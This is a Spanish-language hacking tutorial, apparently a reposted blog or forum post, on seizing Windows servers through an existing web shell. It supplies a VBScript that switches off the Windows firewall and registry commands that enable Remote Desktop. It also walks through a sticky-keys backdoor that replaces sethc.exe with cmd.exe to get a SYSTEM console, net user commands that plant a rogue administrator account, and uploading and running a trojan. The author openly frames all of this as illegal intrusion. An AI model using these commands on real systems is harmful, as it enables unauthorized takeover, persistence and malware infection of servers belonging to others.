------------------------------------------------------------------------------------------------------
Rooteando Servidores Windows
Buenas
Esta es la segunda parte del tutorial 1/2 Rootear Servidores Linux o Unix, en esta segunda parte como bien dice el título se tratará sobre los servidores Windows.
Como ya ha sido explicado en el primer tuto no voy a volver a explicar lo que es el Rooteo ni nada referente a las WebShell, permisos, ni directivas PHP.
Cabe destacar que teniendo una WebShell en un servidor Windows es como tener total control de la Shell de Windows, ya que podemos ejecutar cualquier tipo de orden mediante la WebShell.
1 - 50% de posibilidades.
2 - Bypasseando el Firewall.
3 - Backdoorizando (Terminal Server).
4 - Accediendo como SYSYEM (root de Windows).
5 - Terminal Server sin usuario SYSTEM (Alternativa).
6 - Troyanizando (Alternativa).
1 - 50% de posibilidades
¿50%?
Si, el cincuenta por ciento de posibilidades que tenemos para que todo salga, o todo no salga (suponiendo que ya hayamos bypasseado lo que debamos haber bypasseado).
¿Por qué esto es así?
Esto es así debido que la persona que haya montado el servidor o servidores haya decidido correrlos con una cuenta Limitada o una de Administrador.
Para poder realizar el rooteo, nos debe haber tocado una cuenta de Administrador (lo más normal es que sí).
La siguiente imagen lo explica:
Como podemos ver, necesitamos por lo menos Instalar programas
2 - Bypasseando el Firewall
Bueno, esto no es muy dificil, ya que simplemente deberemos ejecutar un script Visual Basic Script (VBScript).
Abrimos un editor de texto, y pegamos el siguiente code VBS:
Código: [Seleccionar]
Set objFirewall = CreateObject("HNetCfg.FwMgr")
Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
objPolicy.FirewallEnabled = falseEste code lo guardamos como, firewall.vbs.
Ahora solo debemos subirlo mediante la WebShell al directorio que sea, y en ese mismo directorio ejecutar esto en la entrada de comandos de la WebShell:
Código: [Seleccionar]
rutadelarchivo\firewall.vbs
Es decir, imaginemos que hemos viajado hasta el disco C: :
Código: [Seleccionar]
C:\firewall.vbs
Chao Firewall :dedo: !
3 - Backdoorizando (Terminal Server)
Bien, esto consiste en habilitarle el servidor de Terminal Server, Escritorio Remoto de Windows en otras palabras, y de paso cambiarle sethc.exe por cmd.exe.
Para ello podeis echar un vistazo al tutorial que hizo hace tiempo 3D1, Manual - Hackear por Escritorio Remoto de Windows (Por Puerto 3389).
Lo seguis hasta el paso 2.1), y copiais el segundo code, lo guardais como backdoor.bat y ya
Cuando esté el .bat listo, simplemente habrá que subirlo mediante la WebShell al directorio que se quiera y hacer lo mismo que con el VBScript:
Código: [Seleccionar]
rutadelarchivo\backdoor.bat
En caso de estar en C: :
Código: [Seleccionar]
C:\backdoor.bat
Ahora rezemos porque se haya abierto el puerto en el Router
:cura: Padre nuestro que estás en bla bla bla... :cura:
4 - Accediendo como SYSYEM (root de Windows)
Si se ha backdoorizado correctamente y nuestro señor nos ha abierto el puerto en el Router (XD), bastaría con hacerle una visitita con nuestro cliente de escritorio remoto o rdesktop de Linux.
En el caso que estemos en Windows:
Inicio, ejecutar, mstsc.exe o Iinicio\Todos los Programas\Accesorios\Comunicaciones\Conexion a Escritorio Remoto.
En ese menú, le damos al botón [Opciones >>]
Luego nos pasamos a la pestaña "Recursos locales"
y cambiamos solo la opcion "Teclado", desplegamos la lista y seleccionamos "En el equipo remoto".
En el caso de Linux no hay que configurar eso, ya que siempre se ejecuta en el equipo remoto.
Llegó la hora de la verdad...
Abriremos nuestra consola y haremos un ping a la web, de forma que nos devuelva la Ip del servidor en el que se aloja y hemos backdoorizado.
Citar
ping www.pagina.com
Haciendo ping a www.pagina.com [123.123.123.123] con 32 bytes de datos:
Respuesta desde 123.123.123.123: bytes=32 tiempo=71ms TTL=246
Respuesta desde 123.123.123.123: bytes=32 tiempo=56ms TTL=246
Respuesta desde 123.123.123.123: bytes=32 tiempo=62ms TTL=246
Respuesta desde 123.123.123.123: bytes=32 tiempo=62ms TTL=246
Estadísticas de ping para 123.123.123.123:
Paquetes: enviados = 4, recibidos = 4, perdidos = 0
(0% perdidos),
Tiempos aproximados de ida y vuelta en milisegundos:
Mínimo = 56ms, Máximo = 71ms, Media = 62ms
Eso en Win, en Linux es igual.Haciendo ping a www.pagina.com [123.123.123.123] con 32 bytes de datos:
Respuesta desde 123.123.123.123: bytes=32 tiempo=71ms TTL=246
Respuesta desde 123.123.123.123: bytes=32 tiempo=56ms TTL=246
Respuesta desde 123.123.123.123: bytes=32 tiempo=62ms TTL=246
Respuesta desde 123.123.123.123: bytes=32 tiempo=62ms TTL=246
Estadísticas de ping para 123.123.123.123:
Paquetes: enviados = 4, recibidos = 4, perdidos = 0
(0% perdidos),
Tiempos aproximados de ida y vuelta en milisegundos:
Mínimo = 56ms, Máximo = 71ms, Media = 62ms
Bueno, a nosotros nos interesa la parte roja, que es la Ip del servidor en el que se aloja la Web.
Esa es la Ip que debemos introducir en el cliente de escritorio remoto.
En Windows con el cliente abierto:
Código: [Seleccionar]
Equipo: [123.123.123.123]
[Conectar]
En Linux abrimos una terminal e introducimos:
Código: [Seleccionar]
rdesktop 123.123.123.123
Bueno, si el señor fué bueno y nos abrio el puerto en el Router, deberiamos estar en el Logon de Windows, donde nos pide un usuario y una password.
Aunque no la sepamos, como habíamos Backdoorizado con el .bat de 3D1, al presionar 5 veces la tecla shift:
Se nos abrirá una consola situada en la raíz del systema, osease, system32...
Povale, que bien XD.
¿Pero donde está el SYSTEM?
Bueno, si quereis enteraros de como funciona la cosa clickead aquí, si quereis ahorrar el paso de leerlo haced lo siguiente:
Situados en la Consola que se abrio en el Logon del servidor, teclead explorer.exe, y bueno, lo que pasa en windows es que al haber abierto una Consola sin que haya sido abierta desde el menu ejecutar, herramientas en el inicio, o desde la carpeta system32, se abrira con el nombre de svchost.exe, y al ejecutar el proceso explorer, se abrirá el escritorio y nuestro usuario será SYSTEM, que viene a ser algo así como el root de Windows, ojo, que no es un root como el de Linux o Unix, es un root oculto que en principio no se debería saber de él (
somos kakers que nos saltamos la ley )Bueo, a la cosa, ejecutamos explorer.exe y se nos abrira el escritorio...
Pulsamos el boton de la tecla inicio, miramos el usuario...
¡SYSTEM!
¡Somos root en windows sin necesidad de root exploits!
Ya podeis si quereis cerrar la consola, teclear Alt Ctrl Supr y en la pestaña procesos cerrar winlogon.exe, que sino se nos quedará de fondo de pantalla lo de meter el usuario y password
5 - Terminal Server sin usuario SYSTEM
¿Qué quiere decir esto?
Pues que para realizar esta conexión, no vamos a sustituir sethc.exe por cmd.exe, sino que vamos a hacer una conexión normal.
Para esto, se debe de crear un bat que habilite Terminal Server (Escritorio Remoto de Windows) de la siguiente manera:
Código: [Seleccionar]
reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /t "REG_DWORD" /d 0
Borra la clave del registro que bloquea las conexiones entranter de Terminal Server y crea una clave que las acepta.
Eso lo guardamos como escritorio.bat.
Entonces hacemos mano de nuestra WebShell, subimos el bat y hacemos lo siguiente:
Código: [Seleccionar]
rutadelbat\escritorio.bat
Es decir, si lo hemos subido en C: :
Código: [Seleccionar]
C:\escritorio.bat
Bueno, con eso se supone que el servidor de termial server está activo en el servidor remoto.
Ahora tenemos que crear un usuario con derechos de administador para poder conectarnos.
Vamos a la entrada de comandos de la WebShell y escribimos:
Código: [Seleccionar]
Net User Nombre Contraseña /add
Por ejemplo, si de nombre le queremos poner messerschmitt y de contraseña 123456:
Código: [Seleccionar]
Net User messerschmitt 123456 /add
Vale, ya hemos creado un usuario, pero todavía no tiene privilegios de administrador, para dárselos, hacemos lo siguiente:
Código: [Seleccionar]
Net Localgroup Administrators Nombre /add
Si el usuario que hemos creado es messerschmitt:
Código: [Seleccionar]
Net Localgroup Administrators messerschmitt /add
Bueno, como ya tenemos el Terminal Server activo y corriendo, y un usuario con privilegios de adminstrador, solo queda conectarnos vía Escritorio Remoto, poner de nombre messerschmitt y contraseña 123456, y boilá, tenemos el servidor en nuestras manos
6 - Troyanizando
Bueno, esta parte es la más fácil y
Simplemente hay que hacer mano de la WebShell, subir nuestro troyano, y ejecutarlo mediante la entrada de comandos:
Código: [Seleccionar]
rutadeltroyano\server.exe
Es decir, si lo hemos subido a C: :
Código: [Seleccionar]
C:\server.exe
Y boilá, hemos infectado un servidor remoto sin necesidad de tratar con el dueño por msn
Aunque personalmente prefiero todo el método de backdoorizar y acceder como SYSTEM, que aunque sea más largo y tedioso es la verdadera forma de hacer las cosas bien, enterandote de cómo son
Un saludo
FUENTE:http://argeniverso.66ghz.com/index.php?
Aprovechen al maximo la libertad de informacion pero siempre con la etica que se merece.
saludos roboticos
Entradas
No hay comentarios:
Publicar un comentario